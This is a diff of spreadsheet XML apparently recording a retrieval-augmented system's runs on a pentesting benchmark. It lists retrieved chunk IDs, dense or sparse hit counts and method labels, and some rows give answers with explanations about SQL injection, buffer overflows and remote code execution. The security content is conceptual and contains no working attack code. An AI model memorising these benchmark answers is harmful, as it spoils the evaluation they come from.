+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9232,19 +9210,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 7b617c4a-1b3b-4481-8bf5-6d0fe80f1b8e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 73ad948f-984e-4fd2-b5af-5e206fd07d65, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 3a63c30d-65d3-426b-982d-39af8b3f0d09, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: bd060a5f-5589-43ad-a132-ad7efb593ba8, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 73ad948f-984e-4fd2-b5af-5e206fd07d65, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 3a63c30d-65d3-426b-982d-39af8b3f0d09, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: bd060a5f-5589-43ad-a132-ad7efb593ba8, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I131" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J131" t="n">
@@ -9252,7 +9230,7 @@
       </c>
       <c r="K131" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9301,17 +9279,17 @@
 preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I132" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J132" t="n">
@@ -9319,7 +9297,7 @@
       </c>
       <c r="K132" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9373,12 +9351,12 @@
 preemware_pentestingeval.pdf (Chunk: 950e23ef-ae90-498d-9955-66f87f185c40, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 72afb988-5c0b-4173-ac34-2220ef8a72e9, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I133" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J133" t="n">
@@ -9386,7 +9364,7 @@
       </c>
       <c r="K133" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9432,20 +9410,20 @@
       <c r="H134" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 2c236ca7-35b7-437e-a239-f9aa6274b1a5, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I134" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J134" t="n">
@@ -9453,7 +9431,7 @@
       </c>
       <c r="K134" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9488,7 +9466,7 @@
       <c r="F135" t="inlineStr">
         <is>
           <t>Answer: Remote code execution via SQL injection
-Explanation: The most effective technique for compromising a web application's admin panel in this scenario would be 'Remote code execution via SQL injection'. This attack involves exploiting a security vulnerability occurring in the database layer of an application. Vulnerabilities are present when user inputs are incorrectly sanitized, allowing an attacker to inject malicious SQL statements into entry fields for execution (e.g., to dump database contents to the attacker). Local privilege escalation using buffer overflow is generally related to overflow conditions in application memory space rather than database access specifically. Session hijacking through cross-site scripting is primarily used for attacking users of the web application rather than the backend database itself, making SQL injection the most direct and relevant choice for this scenario. A Denial of Service (DoS) attack using SYN flood would not directly compromise the admin panel but instead aim to make the server unavailable or slow down its response time.</t>
+Explanation: The most effective technique for compromising a web application's admin panel in this scenario would be 'Remote code execution via SQL injection'. This attack involves exploiting a security vulnerability that occurs when user inputs are not correctly sanitized or validated, allowing an attacker to inject malicious SQL statements into entry fields for execution (e.g., to dump database contents to the attacker). Buffer overflow exploits, while serious, are generally related to overflow conditions in application memory space rather than database access specifically. Brute-force attacks on encrypted files are unrelated to direct database access through a web application. Cross-site scripting (XSS) is primarily used for attacking users of the web application rather than the backend database itself, making SQL injection the most direct and relevant choice for this scenario.</t>
         </is>
       </c>
       <c r="G135" t="inlineStr">
@@ -9503,16 +9481,16 @@
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I135" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J135" t="n">
@@ -9520,7 +9498,7 @@
       </c>
       <c r="K135" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9568,20 +9546,20 @@
       <c r="H136" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 66d16429-d931-4984-bd59-02b90fff1053, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 4)
 cowWhySo-pentest-redteam-steering.md (Chunk: 4d83f0d6-b826-4259-8ed2-4b776d900a97, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 33a81ea5-e2d4-4b7f-934e-5e7dada9648b, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 33a81ea5-e2d4-4b7f-934e-5e7dada9648b, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 3ce003fc-f967-479a-be9c-461f49ad3c11, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I136" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J136" t="n">
@@ -9589,7 +9567,7 @@
       </c>
       <c r="K136" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9642,13 +9620,13 @@
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I137" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J137" t="n">
@@ -9656,7 +9634,7 @@
       </c>
       <c r="K137" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9691,7 +9669,7 @@
       <c r="F138" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow in stack memory
-Explanation: A buffer overflow in stack memory occurs when more data is fed into a buffer than it is designed to hold. This discrepancy often corrupts adjacent memory, which can be exploited by attackers to execute arbitrary code, manipulate the execution flow of a program, or cause the program to crash. In contrast, SQL injection vulnerabilities and misconfigurations in server settings are related to database management systems and server configurations respectively, while cross-site scripting (XSS) attacks involve injecting malicious scripts into web pages viewed by other users, but do not directly exploit buffer overflows or cause system crashes via input lengths.</t>
+Explanation: A buffer overflow in stack memory occurs when more data is fed into a buffer than it is designed to hold. This discrepancy often corrupts adjacent memory, which can be exploited by attackers to execute arbitrary code, manipulate the execution flow of a program, or cause the program to crash. In contrast, SQL injection vulnerabilities and cross-site scripting attacks are primarily web application vulnerabilities that involve injecting malicious code into user inputs to manipulate database data or execute scripts in the user's browser, respectively. Misconfiguration in server settings refers to improperly configured server settings that can lead to security issues but is not directly related to buffer overflow exploitation.</t>
         </is>
       </c>
       <c r="G138" t="inlineStr">
@@ -9703,19 +9681,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 011afc4e-bb91-4810-a4fa-6b97859f49a0, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2bcd487a-ccce-43e5-ac47-528e0428474b, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 2bcd487a-ccce-43e5-ac47-528e0428474b, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d1c4b7b3-060c-49f4-bc10-32d940a06c4f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I138" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J138" t="n">
@@ -9723,7 +9701,7 @@
       </c>
       <c r="K138" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9798,7 +9776,7 @@
       </c>
       <c r="K139" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9833,7 +9811,7 @@
       <c r="F140" t="inlineStr">
         <is>
           <t>Answer: Remote code execution vulnerabilities
-Explanation: Remote code execution (RCE) vulnerabilities are critical security flaws that allow an attacker to execute arbitrary code on a server or other target system, typically giving the attacker the ability to perform any operation that the system allows. This could include executing commands, installing malware, or manipulating server processes. SQL injection vulnerabilities, while severe, primarily allow an attacker to manipulate a database query, which can lead to data theft, loss, or corruption, but do not inherently grant the ability to execute arbitrary server-side code unless the database server itself is misconfigured to permit this. Cross-site scripting (XSS) vulnerabilities are also serious security issues that could potentially be exploited to cause harm, such as data theft or script execution in the context of a web browser, but these types of vulnerabilities do not directly enable operating system command execution.</t>
+Explanation: Remote code execution (RCE) vulnerabilities are critical security flaws that allow an attacker to execute arbitrary code on a server or other target system, typically giving the attacker the ability to perform any operation that the system allows. This could include executing commands, installing malware, or manipulating server processes. SQL injection vulnerabilities, while severe, primarily allow an attacker to manipulate a database query, which can lead to data theft, loss, or corruption, but do not inherently grant the ability to execute arbitrary server-side code unless the database server itself is misconfigured to permit this. Cross-site scripting (XSS) and Denial of Service vulnerabilities are also serious security issues, but they do not directly enable operating system command execution on the server.</t>
         </is>
       </c>
       <c r="G140" t="inlineStr">
@@ -9850,14 +9828,14 @@
 preemware_pentestingeval.pdf (Chunk: 863931e2-a680-4ee8-846b-f4053787bdc1, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: e40e4c76-2816-4f1b-b4a9-e43d8e206282, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I140" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J140" t="n">
@@ -9865,7 +9843,7 @@
       </c>
       <c r="K140" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9912,19 +9890,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: bd060a5f-5589-43ad-a132-ad7efb593ba8, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I141" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 4, Keyword: 6, Total: 10</t>
         </is>
       </c>
       <c r="J141" t="n">
@@ -9932,7 +9910,7 @@
       </c>
       <c r="K141" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9978,7 +9956,7 @@
       <c r="H142" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 28b5b162-5fe3-4694-ab70-f2cc135754de, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)
@@ -9991,7 +9969,7 @@
       </c>
       <c r="I142" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J142" t="n">
@@ -9999,7 +9977,7 @@
       </c>
       <c r="K142" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10044,7 +10022,7 @@
       </c>
       <c r="H143" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 1)
+          <t>preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: sparse, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 4)
@@ -10058,7 +10036,7 @@
       </c>
       <c r="I143" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J143" t="n">
@@ -10066,7 +10044,7 @@
       </c>
       <c r="K143" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10115,17 +10093,17 @@
 preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: e78549e0-b496-4306-a1ed-09d66de728fb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 7b617c4a-1b3b-4481-8bf5-6d0fe80f1b8e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 0adf643c-3c85-44a4-ab1e-397efae38e4b, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 7b617c4a-1b3b-4481-8bf5-6d0fe80f1b8e, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 0adf643c-3c85-44a4-ab1e-397efae38e4b, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I144" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J144" t="n">
@@ -10133,7 +10111,7 @@
       </c>
       <c r="K144" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10180,7 +10158,7 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 4803957c-c81b-46be-9e64-8d0fd54656f2, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 8d479ebf-923b-4de8-adcf-31ea07821612, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 8d479ebf-923b-4de8-adcf-31ea07821612, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 6)
@@ -10192,7 +10170,7 @@
       </c>
       <c r="I145" t="inlineStr">
